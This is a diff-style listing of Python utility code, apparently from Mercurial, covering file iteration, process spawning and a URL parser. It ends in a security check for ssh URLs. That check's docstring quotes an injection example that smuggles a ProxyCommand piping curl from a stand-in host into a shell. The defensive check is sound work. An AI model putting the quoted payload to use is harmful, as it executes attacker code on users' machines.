2471 # fp.__iter__ but not other fp.read* methods.
2468 # fp.__iter__ but not other fp.read* methods.
2472 #
2469 #
2473 # On modern systems like Linux, the "read" syscall cannot be interrupted
2470 # On modern systems like Linux, the "read" syscall cannot be interrupted
2474 # when reading "fast" files like on-disk files. So the EINTR issue only
2471 # when reading "fast" files like on-disk files. So the EINTR issue only
2475 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2472 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2476 # files approximately as "fast" files and use the fast (unsafe) code path,
2473 # files approximately as "fast" files and use the fast (unsafe) code path,
2477 # to minimize the performance impact.
2474 # to minimize the performance impact.
2478 if sys.version_info >= (2, 7, 4):
2475 if sys.version_info >= (2, 7, 4):
2479 # fp.readline deals with EINTR correctly, use it as a workaround.
2476 # fp.readline deals with EINTR correctly, use it as a workaround.
2480 def _safeiterfile(fp):
2477 def _safeiterfile(fp):
2481 return iter(fp.readline, '')
2478 return iter(fp.readline, '')
2482 else:
2479 else:
2483 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2480 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2484 # note: this may block longer than necessary because of bufsize.
2481 # note: this may block longer than necessary because of bufsize.
2485 def _safeiterfile(fp, bufsize=4096):
2482 def _safeiterfile(fp, bufsize=4096):
2486 fd = fp.fileno()
2483 fd = fp.fileno()
2487 line = ''
2484 line = ''
2488 while True:
2485 while True:
2489 try:
2486 try:
2490 buf = os.read(fd, bufsize)
2487 buf = os.read(fd, bufsize)
2491 except OSError as ex:
2488 except OSError as ex:
2492 # os.read only raises EINTR before any data is read
2489 # os.read only raises EINTR before any data is read
2493 if ex.errno == errno.EINTR:
2490 if ex.errno == errno.EINTR:
2494 continue
2491 continue
2495 else:
2492 else:
2496 raise
2493 raise
2497 line += buf
2494 line += buf
2498 if '\n' in buf:
2495 if '\n' in buf:
2499 splitted = line.splitlines(True)
2496 splitted = line.splitlines(True)
2500 line = ''
2497 line = ''
2501 for l in splitted:
2498 for l in splitted:
2502 if l[-1] == '\n':
2499 if l[-1] == '\n':
2503 yield l
2500 yield l
2504 else:
2501 else:
2505 line = l
2502 line = l
2506 if not buf:
2503 if not buf:
2507 break
2504 break
2508 if line:
2505 if line:
2509 yield line
2506 yield line
2510
2507
2511 def iterfile(fp):
2508 def iterfile(fp):
2512 fastpath = True
2509 fastpath = True
2513 if type(fp) is file:
2510 if type(fp) is file:
2514 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2511 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2515 if fastpath:
2512 if fastpath:
2516 return fp
2513 return fp
2517 else:
2514 else:
2518 return _safeiterfile(fp)
2515 return _safeiterfile(fp)
2519 else:
2516 else:
2520 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2517 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2521 def iterfile(fp):
2518 def iterfile(fp):
2522 return fp
2519 return fp
2523
2520
2524 def iterlines(iterator):
2521 def iterlines(iterator):
2525 for chunk in iterator:
2522 for chunk in iterator:
2526 for line in chunk.splitlines():
2523 for line in chunk.splitlines():
2527 yield line
2524 yield line
2528
2525
2529 def expandpath(path):
2526 def expandpath(path):
2530 return os.path.expanduser(os.path.expandvars(path))
2527 return os.path.expanduser(os.path.expandvars(path))
2531
2528
2532 def hgcmd():
2529 def hgcmd():
2533 """Return the command used to execute current hg
2530 """Return the command used to execute current hg
2534
2531
2535 This is different from hgexecutable() because on Windows we want
2532 This is different from hgexecutable() because on Windows we want
2536 to avoid things opening new shell windows like batch files, so we
2533 to avoid things opening new shell windows like batch files, so we
2537 get either the python call or current executable.
2534 get either the python call or current executable.
2538 """
2535 """
2539 if mainfrozen():
2536 if mainfrozen():
2540 if getattr(sys, 'frozen', None) == 'macosx_app':
2537 if getattr(sys, 'frozen', None) == 'macosx_app':
2541 # Env variable set by py2app
2538 # Env variable set by py2app
2542 return [encoding.environ['EXECUTABLEPATH']]
2539 return [encoding.environ['EXECUTABLEPATH']]
2543 else:
2540 else:
2544 return [pycompat.sysexecutable]
2541 return [pycompat.sysexecutable]
2545 return gethgcmd()
2542 return gethgcmd()
2546
2543
2547 def rundetached(args, condfn):
2544 def rundetached(args, condfn):
2548 """Execute the argument list in a detached process.
2545 """Execute the argument list in a detached process.
2549
2546
2550 condfn is a callable which is called repeatedly and should return
2547 condfn is a callable which is called repeatedly and should return
2551 True once the child process is known to have started successfully.
2548 True once the child process is known to have started successfully.
2552 At this point, the child process PID is returned. If the child
2549 At this point, the child process PID is returned. If the child
2553 process fails to start or finishes before condfn() evaluates to
2550 process fails to start or finishes before condfn() evaluates to
2554 True, return -1.
2551 True, return -1.
2555 """
2552 """
2556 # Windows case is easier because the child process is either
2553 # Windows case is easier because the child process is either
2557 # successfully starting and validating the condition or exiting
2554 # successfully starting and validating the condition or exiting
2558 # on failure. We just poll on its PID. On Unix, if the child
2555 # on failure. We just poll on its PID. On Unix, if the child
2559 # process fails to start, it will be left in a zombie state until
2556 # process fails to start, it will be left in a zombie state until
2560 # the parent wait on it, which we cannot do since we expect a long
2557 # the parent wait on it, which we cannot do since we expect a long
2561 # running process on success. Instead we listen for SIGCHLD telling
2558 # running process on success. Instead we listen for SIGCHLD telling
2562 # us our child process terminated.
2559 # us our child process terminated.
2563 terminated = set()
2560 terminated = set()
2564 def handler(signum, frame):
2561 def handler(signum, frame):
2565 terminated.add(os.wait())
2562 terminated.add(os.wait())
2566 prevhandler = None
2563 prevhandler = None
2567 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2564 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2568 if SIGCHLD is not None:
2565 if SIGCHLD is not None:
2569 prevhandler = signal.signal(SIGCHLD, handler)
2566 prevhandler = signal.signal(SIGCHLD, handler)
2570 try:
2567 try:
2571 pid = spawndetached(args)
2568 pid = spawndetached(args)
2572 while not condfn():
2569 while not condfn():
2573 if ((pid in terminated or not testpid(pid))
2570 if ((pid in terminated or not testpid(pid))
2574 and not condfn()):
2571 and not condfn()):
2575 return -1
2572 return -1
2576 time.sleep(0.1)
2573 time.sleep(0.1)
2577 return pid
2574 return pid
2578 finally:
2575 finally:
2579 if prevhandler is not None:
2576 if prevhandler is not None:
2580 signal.signal(signal.SIGCHLD, prevhandler)
2577 signal.signal(signal.SIGCHLD, prevhandler)
2581
2578
2582 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2579 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2583 """Return the result of interpolating items in the mapping into string s.
2580 """Return the result of interpolating items in the mapping into string s.
2584
2581
2585 prefix is a single character string, or a two character string with
2582 prefix is a single character string, or a two character string with
2586 a backslash as the first character if the prefix needs to be escaped in
2583 a backslash as the first character if the prefix needs to be escaped in
2587 a regular expression.
2584 a regular expression.
2588
2585
2589 fn is an optional function that will be applied to the replacement text
2586 fn is an optional function that will be applied to the replacement text
2590 just before replacement.
2587 just before replacement.
2591
2588
2592 escape_prefix is an optional flag that allows using doubled prefix for
2589 escape_prefix is an optional flag that allows using doubled prefix for
2593 its escaping.
2590 its escaping.
2594 """
2591 """
2595 fn = fn or (lambda s: s)
2592 fn = fn or (lambda s: s)
2596 patterns = '|'.join(mapping.keys())
2593 patterns = '|'.join(mapping.keys())
2597 if escape_prefix:
2594 if escape_prefix:
2598 patterns += '|' + prefix
2595 patterns += '|' + prefix
2599 if len(prefix) > 1:
2596 if len(prefix) > 1:
2600 prefix_char = prefix[1:]
2597 prefix_char = prefix[1:]
2601 else:
2598 else:
2602 prefix_char = prefix
2599 prefix_char = prefix
2603 mapping[prefix_char] = prefix_char
2600 mapping[prefix_char] = prefix_char
2604 r = remod.compile(r'%s(%s)' % (prefix, patterns))
2601 r = remod.compile(r'%s(%s)' % (prefix, patterns))
2605 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2602 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2606
2603
2607 def getport(port):
2604 def getport(port):
2608 """Return the port for a given network service.
2605 """Return the port for a given network service.
2609
2606
2610 If port is an integer, it's returned as is. If it's a string, it's
2607 If port is an integer, it's returned as is. If it's a string, it's
2611 looked up using socket.getservbyname(). If there's no matching
2608 looked up using socket.getservbyname(). If there's no matching
2612 service, error.Abort is raised.
2609 service, error.Abort is raised.
2613 """
2610 """
2614 try:
2611 try:
2615 return int(port)
2612 return int(port)
2616 except ValueError:
2613 except ValueError:
2617 pass
2614 pass
2618
2615
2619 try:
2616 try:
2620 return socket.getservbyname(port)
2617 return socket.getservbyname(port)
2621 except socket.error:
2618 except socket.error:
2622 raise Abort(_("no port number associated with service '%s'") % port)
2619 raise Abort(_("no port number associated with service '%s'") % port)
2623
2620
2624 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2621 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2625 '0': False, 'no': False, 'false': False, 'off': False,
2622 '0': False, 'no': False, 'false': False, 'off': False,
2626 'never': False}
2623 'never': False}
2627
2624
2628 def parsebool(s):
2625 def parsebool(s):
2629 """Parse s into a boolean.
2626 """Parse s into a boolean.
2630
2627
2631 If s is not a valid boolean, returns None.
2628 If s is not a valid boolean, returns None.
2632 """
2629 """
2633 return _booleans.get(s.lower(), None)
2630 return _booleans.get(s.lower(), None)
2634
2631
2635 _hextochr = dict((a + b, chr(int(a + b, 16)))
2632 _hextochr = dict((a + b, chr(int(a + b, 16)))
2636 for a in string.hexdigits for b in string.hexdigits)
2633 for a in string.hexdigits for b in string.hexdigits)
2637
2634
2638 class url(object):
2635 class url(object):
2639 r"""Reliable URL parser.
2636 r"""Reliable URL parser.
2640
2637
2641 This parses URLs and provides attributes for the following
2638 This parses URLs and provides attributes for the following
2642 components:
2639 components:
2643
2640
2644 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2641 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2645
2642
2646 Missing components are set to None. The only exception is
2643 Missing components are set to None. The only exception is
2647 fragment, which is set to '' if present but empty.
2644 fragment, which is set to '' if present but empty.
2648
2645
2649 If parsefragment is False, fragment is included in query. If
2646 If parsefragment is False, fragment is included in query. If
2650 parsequery is False, query is included in path. If both are
2647 parsequery is False, query is included in path. If both are
2651 False, both fragment and query are included in path.
2648 False, both fragment and query are included in path.
2652
2649
2653 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2650 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2654
2651
2655 Note that for backward compatibility reasons, bundle URLs do not
2652 Note that for backward compatibility reasons, bundle URLs do not
2656 take host names. That means 'bundle://../' has a path of '../'.
2653 take host names. That means 'bundle://../' has a path of '../'.
2657
2654
2658 Examples:
2655 Examples:
2659
2656
2660 >>> url('http://www.ietf.org/rfc/rfc2396.txt')
2657 >>> url('http://www.ietf.org/rfc/rfc2396.txt')
2661 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2658 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2662 >>> url('ssh://[::1]:2200//home/joe/repo')
2659 >>> url('ssh://[::1]:2200//home/joe/repo')
2663 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2660 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2664 >>> url('file:///home/joe/repo')
2661 >>> url('file:///home/joe/repo')
2665 <url scheme: 'file', path: '/home/joe/repo'>
2662 <url scheme: 'file', path: '/home/joe/repo'>
2666 >>> url('file:///c:/temp/foo/')
2663 >>> url('file:///c:/temp/foo/')
2667 <url scheme: 'file', path: 'c:/temp/foo/'>
2664 <url scheme: 'file', path: 'c:/temp/foo/'>
2668 >>> url('bundle:foo')
2665 >>> url('bundle:foo')
2669 <url scheme: 'bundle', path: 'foo'>
2666 <url scheme: 'bundle', path: 'foo'>
2670 >>> url('bundle://../foo')
2667 >>> url('bundle://../foo')
2671 <url scheme: 'bundle', path: '../foo'>
2668 <url scheme: 'bundle', path: '../foo'>
2672 >>> url(r'c:\foo\bar')
2669 >>> url(r'c:\foo\bar')
2673 <url path: 'c:\\foo\\bar'>
2670 <url path: 'c:\\foo\\bar'>
2674 >>> url(r'\\blah\blah\blah')
2671 >>> url(r'\\blah\blah\blah')
2675 <url path: '\\\\blah\\blah\\blah'>
2672 <url path: '\\\\blah\\blah\\blah'>
2676 >>> url(r'\\blah\blah\blah#baz')
2673 >>> url(r'\\blah\blah\blah#baz')
2677 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2674 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2678 >>> url(r'file:///C:\users\me')
2675 >>> url(r'file:///C:\users\me')
2679 <url scheme: 'file', path: 'C:\\users\\me'>
2676 <url scheme: 'file', path: 'C:\\users\\me'>
2680
2677
2681 Authentication credentials:
2678 Authentication credentials:
2682
2679
2683 >>> url('ssh://joe:xyz@x/repo')
2680 >>> url('ssh://joe:xyz@x/repo')
2684 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2681 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2685 >>> url('ssh://joe@x/repo')
2682 >>> url('ssh://joe@x/repo')
2686 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2683 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2687
2684
2688 Query strings and fragments:
2685 Query strings and fragments:
2689
2686
2690 >>> url('http://host/a?b#c')
2687 >>> url('http://host/a?b#c')
2691 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2688 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2692 >>> url('http://host/a?b#c', parsequery=False, parsefragment=False)
2689 >>> url('http://host/a?b#c', parsequery=False, parsefragment=False)
2693 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2690 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2694
2691
2695 Empty path:
2692 Empty path:
2696
2693
2697 >>> url('')
2694 >>> url('')
2698 <url path: ''>
2695 <url path: ''>
2699 >>> url('#a')
2696 >>> url('#a')
2700 <url path: '', fragment: 'a'>
2697 <url path: '', fragment: 'a'>
2701 >>> url('http://host/')
2698 >>> url('http://host/')
2702 <url scheme: 'http', host: 'host', path: ''>
2699 <url scheme: 'http', host: 'host', path: ''>
2703 >>> url('http://host/#a')
2700 >>> url('http://host/#a')
2704 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2701 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2705
2702
2706 Only scheme:
2703 Only scheme:
2707
2704
2708 >>> url('http:')
2705 >>> url('http:')
2709 <url scheme: 'http'>
2706 <url scheme: 'http'>
2710 """
2707 """
2711
2708
2712 _safechars = "!~*'()+"
2709 _safechars = "!~*'()+"
2713 _safepchars = "/!~*'()+:\\"
2710 _safepchars = "/!~*'()+:\\"
2714 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2711 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2715
2712
2716 def __init__(self, path, parsequery=True, parsefragment=True):
2713 def __init__(self, path, parsequery=True, parsefragment=True):
2717 # We slowly chomp away at path until we have only the path left
2714 # We slowly chomp away at path until we have only the path left
2718 self.scheme = self.user = self.passwd = self.host = None
2715 self.scheme = self.user = self.passwd = self.host = None
2719 self.port = self.path = self.query = self.fragment = None
2716 self.port = self.path = self.query = self.fragment = None
2720 self._localpath = True
2717 self._localpath = True
2721 self._hostport = ''
2718 self._hostport = ''
2722 self._origpath = path
2719 self._origpath = path
2723
2720
2724 if parsefragment and '#' in path:
2721 if parsefragment and '#' in path:
2725 path, self.fragment = path.split('#', 1)
2722 path, self.fragment = path.split('#', 1)
2726
2723
2727 # special case for Windows drive letters and UNC paths
2724 # special case for Windows drive letters and UNC paths
2728 if hasdriveletter(path) or path.startswith('\\\\'):
2725 if hasdriveletter(path) or path.startswith('\\\\'):
2729 self.path = path
2726 self.path = path
2730 return
2727 return
2731
2728
2732 # For compatibility reasons, we can't handle bundle paths as
2729 # For compatibility reasons, we can't handle bundle paths as
2733 # normal URLS
2730 # normal URLS
2734 if path.startswith('bundle:'):
2731 if path.startswith('bundle:'):
2735 self.scheme = 'bundle'
2732 self.scheme = 'bundle'
2736 path = path[7:]
2733 path = path[7:]
2737 if path.startswith('//'):
2734 if path.startswith('//'):
2738 path = path[2:]
2735 path = path[2:]
2739 self.path = path
2736 self.path = path
2740 return
2737 return
2741
2738
2742 if self._matchscheme(path):
2739 if self._matchscheme(path):
2743 parts = path.split(':', 1)
2740 parts = path.split(':', 1)
2744 if parts[0]:
2741 if parts[0]:
2745 self.scheme, path = parts
2742 self.scheme, path = parts
2746 self._localpath = False
2743 self._localpath = False
2747
2744
2748 if not path:
2745 if not path:
2749 path = None
2746 path = None
2750 if self._localpath:
2747 if self._localpath:
2751 self.path = ''
2748 self.path = ''
2752 return
2749 return
2753 else:
2750 else:
2754 if self._localpath:
2751 if self._localpath:
2755 self.path = path
2752 self.path = path
2756 return
2753 return
2757
2754
2758 if parsequery and '?' in path:
2755 if parsequery and '?' in path:
2759 path, self.query = path.split('?', 1)
2756 path, self.query = path.split('?', 1)
2760 if not path:
2757 if not path:
2761 path = None
2758 path = None
2762 if not self.query:
2759 if not self.query:
2763 self.query = None
2760 self.query = None
2764
2761
2765 # // is required to specify a host/authority
2762 # // is required to specify a host/authority
2766 if path and path.startswith('//'):
2763 if path and path.startswith('//'):
2767 parts = path[2:].split('/', 1)
2764 parts = path[2:].split('/', 1)
2768 if len(parts) > 1:
2765 if len(parts) > 1:
2769 self.host, path = parts
2766 self.host, path = parts
2770 else:
2767 else:
2771 self.host = parts[0]
2768 self.host = parts[0]
2772 path = None
2769 path = None
2773 if not self.host:
2770 if not self.host:
2774 self.host = None
2771 self.host = None
2775 # path of file:///d is /d
2772 # path of file:///d is /d
2776 # path of file:///d:/ is d:/, not /d:/
2773 # path of file:///d:/ is d:/, not /d:/
2777 if path and not hasdriveletter(path):
2774 if path and not hasdriveletter(path):
2778 path = '/' + path
2775 path = '/' + path
2779
2776
2780 if self.host and '@' in self.host:
2777 if self.host and '@' in self.host:
2781 self.user, self.host = self.host.rsplit('@', 1)
2778 self.user, self.host = self.host.rsplit('@', 1)
2782 if ':' in self.user:
2779 if ':' in self.user:
2783 self.user, self.passwd = self.user.split(':', 1)
2780 self.user, self.passwd = self.user.split(':', 1)
2784 if not self.host:
2781 if not self.host:
2785 self.host = None
2782 self.host = None
2786
2783
2787 # Don't split on colons in IPv6 addresses without ports
2784 # Don't split on colons in IPv6 addresses without ports
2788 if (self.host and ':' in self.host and
2785 if (self.host and ':' in self.host and
2789 not (self.host.startswith('[') and self.host.endswith(']'))):
2786 not (self.host.startswith('[') and self.host.endswith(']'))):
2790 self._hostport = self.host
2787 self._hostport = self.host
2791 self.host, self.port = self.host.rsplit(':', 1)
2788 self.host, self.port = self.host.rsplit(':', 1)
2792 if not self.host:
2789 if not self.host:
2793 self.host = None
2790 self.host = None
2794
2791
2795 if (self.host and self.scheme == 'file' and
2792 if (self.host and self.scheme == 'file' and
2796 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2793 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2797 raise Abort(_('file:// URLs can only refer to localhost'))
2794 raise Abort(_('file:// URLs can only refer to localhost'))
2798
2795
2799 self.path = path
2796 self.path = path
2800
2797
2801 # leave the query string escaped
2798 # leave the query string escaped
2802 for a in ('user', 'passwd', 'host', 'port',
2799 for a in ('user', 'passwd', 'host', 'port',
2803 'path', 'fragment'):
2800 'path', 'fragment'):
2804 v = getattr(self, a)
2801 v = getattr(self, a)
2805 if v is not None:
2802 if v is not None:
2806 setattr(self, a, urlreq.unquote(v))
2803 setattr(self, a, urlreq.unquote(v))
2807
2804
2808 def __repr__(self):
2805 def __repr__(self):
2809 attrs = []
2806 attrs = []
2810 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2807 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2811 'query', 'fragment'):
2808 'query', 'fragment'):
2812 v = getattr(self, a)
2809 v = getattr(self, a)
2813 if v is not None:
2810 if v is not None:
2814 attrs.append('%s: %r' % (a, v))
2811 attrs.append('%s: %r' % (a, v))
2815 return '<url %s>' % ', '.join(attrs)
2812 return '<url %s>' % ', '.join(attrs)
2816
2813
2817 def __bytes__(self):
2814 def __bytes__(self):
2818 r"""Join the URL's components back into a URL string.
2815 r"""Join the URL's components back into a URL string.
2819
2816
2820 Examples:
2817 Examples:
2821
2818
2822 >>> str(url('http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2819 >>> str(url('http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2823 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2820 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2824 >>> str(url('http://user:pw@host:80/?foo=bar&baz=42'))
2821 >>> str(url('http://user:pw@host:80/?foo=bar&baz=42'))
2825 'http://user:pw@host:80/?foo=bar&baz=42'
2822 'http://user:pw@host:80/?foo=bar&baz=42'
2826 >>> str(url('http://user:pw@host:80/?foo=bar%3dbaz'))
2823 >>> str(url('http://user:pw@host:80/?foo=bar%3dbaz'))
2827 'http://user:pw@host:80/?foo=bar%3dbaz'
2824 'http://user:pw@host:80/?foo=bar%3dbaz'
2828 >>> str(url('ssh://user:pw@[::1]:2200//home/joe#'))
2825 >>> str(url('ssh://user:pw@[::1]:2200//home/joe#'))
2829 'ssh://user:pw@[::1]:2200//home/joe#'
2826 'ssh://user:pw@[::1]:2200//home/joe#'
2830 >>> str(url('http://localhost:80//'))
2827 >>> str(url('http://localhost:80//'))
2831 'http://localhost:80//'
2828 'http://localhost:80//'
2832 >>> str(url('http://localhost:80/'))
2829 >>> str(url('http://localhost:80/'))
2833 'http://localhost:80/'
2830 'http://localhost:80/'
2834 >>> str(url('http://localhost:80'))
2831 >>> str(url('http://localhost:80'))
2835 'http://localhost:80/'
2832 'http://localhost:80/'
2836 >>> str(url('bundle:foo'))
2833 >>> str(url('bundle:foo'))
2837 'bundle:foo'
2834 'bundle:foo'
2838 >>> str(url('bundle://../foo'))
2835 >>> str(url('bundle://../foo'))
2839 'bundle:../foo'
2836 'bundle:../foo'
2840 >>> str(url('path'))
2837 >>> str(url('path'))
2841 'path'
2838 'path'
2842 >>> str(url('file:///tmp/foo/bar'))
2839 >>> str(url('file:///tmp/foo/bar'))
2843 'file:///tmp/foo/bar'
2840 'file:///tmp/foo/bar'
2844 >>> str(url('file:///c:/tmp/foo/bar'))
2841 >>> str(url('file:///c:/tmp/foo/bar'))
2845 'file:///c:/tmp/foo/bar'
2842 'file:///c:/tmp/foo/bar'
2846 >>> print url(r'bundle:foo\bar')
2843 >>> print url(r'bundle:foo\bar')
2847 bundle:foo\bar
2844 bundle:foo\bar
2848 >>> print url(r'file:///D:\data\hg')
2845 >>> print url(r'file:///D:\data\hg')
2849 file:///D:\data\hg
2846 file:///D:\data\hg
2850 """
2847 """
2851 if self._localpath:
2848 if self._localpath:
2852 s = self.path
2849 s = self.path
2853 if self.scheme == 'bundle':
2850 if self.scheme == 'bundle':
2854 s = 'bundle:' + s
2851 s = 'bundle:' + s
2855 if self.fragment:
2852 if self.fragment:
2856 s += '#' + self.fragment
2853 s += '#' + self.fragment
2857 return s
2854 return s
2858
2855
2859 s = self.scheme + ':'
2856 s = self.scheme + ':'
2860 if self.user or self.passwd or self.host:
2857 if self.user or self.passwd or self.host:
2861 s += '//'
2858 s += '//'
2862 elif self.scheme and (not self.path or self.path.startswith('/')
2859 elif self.scheme and (not self.path or self.path.startswith('/')
2863 or hasdriveletter(self.path)):
2860 or hasdriveletter(self.path)):
2864 s += '//'
2861 s += '//'
2865 if hasdriveletter(self.path):
2862 if hasdriveletter(self.path):
2866 s += '/'
2863 s += '/'
2867 if self.user:
2864 if self.user:
2868 s += urlreq.quote(self.user, safe=self._safechars)
2865 s += urlreq.quote(self.user, safe=self._safechars)
2869 if self.passwd:
2866 if self.passwd:
2870 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2867 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2871 if self.user or self.passwd:
2868 if self.user or self.passwd:
2872 s += '@'
2869 s += '@'
2873 if self.host:
2870 if self.host:
2874 if not (self.host.startswith('[') and self.host.endswith(']')):
2871 if not (self.host.startswith('[') and self.host.endswith(']')):
2875 s += urlreq.quote(self.host)
2872 s += urlreq.quote(self.host)
2876 else:
2873 else:
2877 s += self.host
2874 s += self.host
2878 if self.port:
2875 if self.port:
2879 s += ':' + urlreq.quote(self.port)
2876 s += ':' + urlreq.quote(self.port)
2880 if self.host:
2877 if self.host:
2881 s += '/'
2878 s += '/'
2882 if self.path:
2879 if self.path:
2883 # TODO: similar to the query string, we should not unescape the
2880 # TODO: similar to the query string, we should not unescape the
2884 # path when we store it, the path might contain '%2f' = '/',
2881 # path when we store it, the path might contain '%2f' = '/',
2885 # which we should *not* escape.
2882 # which we should *not* escape.
2886 s += urlreq.quote(self.path, safe=self._safepchars)
2883 s += urlreq.quote(self.path, safe=self._safepchars)
2887 if self.query:
2884 if self.query:
2888 # we store the query in escaped form.
2885 # we store the query in escaped form.
2889 s += '?' + self.query
2886 s += '?' + self.query
2890 if self.fragment is not None:
2887 if self.fragment is not None:
2891 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2888 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2892 return s
2889 return s
2893
2890
2894 __str__ = encoding.strmethod(__bytes__)
2891 __str__ = encoding.strmethod(__bytes__)
2895
2892
2896 def authinfo(self):
2893 def authinfo(self):
2897 user, passwd = self.user, self.passwd
2894 user, passwd = self.user, self.passwd
2898 try:
2895 try:
2899 self.user, self.passwd = None, None
2896 self.user, self.passwd = None, None
2900 s = bytes(self)
2897 s = bytes(self)
2901 finally:
2898 finally:
2902 self.user, self.passwd = user, passwd
2899 self.user, self.passwd = user, passwd
2903 if not self.user:
2900 if not self.user:
2904 return (s, None)
2901 return (s, None)
2905 # authinfo[1] is passed to urllib2 password manager, and its
2902 # authinfo[1] is passed to urllib2 password manager, and its
2906 # URIs must not contain credentials. The host is passed in the
2903 # URIs must not contain credentials. The host is passed in the
2907 # URIs list because Python < 2.4.3 uses only that to search for
2904 # URIs list because Python < 2.4.3 uses only that to search for
2908 # a password.
2905 # a password.
2909 return (s, (None, (s, self.host),
2906 return (s, (None, (s, self.host),
2910 self.user, self.passwd or ''))
2907 self.user, self.passwd or ''))
2911
2908
2912 def isabs(self):
2909 def isabs(self):
2913 if self.scheme and self.scheme != 'file':
2910 if self.scheme and self.scheme != 'file':
2914 return True # remote URL
2911 return True # remote URL
2915 if hasdriveletter(self.path):
2912 if hasdriveletter(self.path):
2916 return True # absolute for our purposes - can't be joined()
2913 return True # absolute for our purposes - can't be joined()
2917 if self.path.startswith(br'\\'):
2914 if self.path.startswith(br'\\'):
2918 return True # Windows UNC path
2915 return True # Windows UNC path
2919 if self.path.startswith('/'):
2916 if self.path.startswith('/'):
2920 return True # POSIX-style
2917 return True # POSIX-style
2921 return False
2918 return False
2922
2919
2923 def localpath(self):
2920 def localpath(self):
2924 if self.scheme == 'file' or self.scheme == 'bundle':
2921 if self.scheme == 'file' or self.scheme == 'bundle':
2925 path = self.path or '/'
2922 path = self.path or '/'
2926 # For Windows, we need to promote hosts containing drive
2923 # For Windows, we need to promote hosts containing drive
2927 # letters to paths with drive letters.
2924 # letters to paths with drive letters.
2928 if hasdriveletter(self._hostport):
2925 if hasdriveletter(self._hostport):
2929 path = self._hostport + '/' + self.path
2926 path = self._hostport + '/' + self.path
2930 elif (self.host is not None and self.path
2927 elif (self.host is not None and self.path
2931 and not hasdriveletter(path)):
2928 and not hasdriveletter(path)):
2932 path = '/' + path
2929 path = '/' + path
2933 return path
2930 return path
2934 return self._origpath
2931 return self._origpath
2935
2932
2936 def islocal(self):
2933 def islocal(self):
2937 '''whether localpath will return something that posixfile can open'''
2934 '''whether localpath will return something that posixfile can open'''
2938 return (not self.scheme or self.scheme == 'file'
2935 return (not self.scheme or self.scheme == 'file'
2939 or self.scheme == 'bundle')
2936 or self.scheme == 'bundle')
2940
2937
2941 def hasscheme(path):
2938 def hasscheme(path):
2942 return bool(url(path).scheme)
2939 return bool(url(path).scheme)
2943
2940
2944 def hasdriveletter(path):
2941 def hasdriveletter(path):
2945 return path and path[1:2] == ':' and path[0:1].isalpha()
2942 return path and path[1:2] == ':' and path[0:1].isalpha()
2946
2943
2947 def urllocalpath(path):
2944 def urllocalpath(path):
2948 return url(path, parsequery=False, parsefragment=False).localpath()
2945 return url(path, parsequery=False, parsefragment=False).localpath()
2949
2946
2950 def checksafessh(path):
2947 def checksafessh(path):
2951 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2948 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2952
2949
2953 This is a sanity check for ssh urls. ssh will parse the first item as
2950 This is a sanity check for ssh urls. ssh will parse the first item as
2954 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2951 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2955 Let's prevent these potentially exploited urls entirely and warn the
2952 Let's prevent these potentially exploited urls entirely and warn the
2956 user.
2953 user.
2957
2954
2958 Raises an error.Abort when the url is unsafe.
2955 Raises an error.Abort when the url is unsafe.
2959 """
2956 """
2960 path = urlreq.unquote(path)
2957 path = urlreq.unquote(path)
2961 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
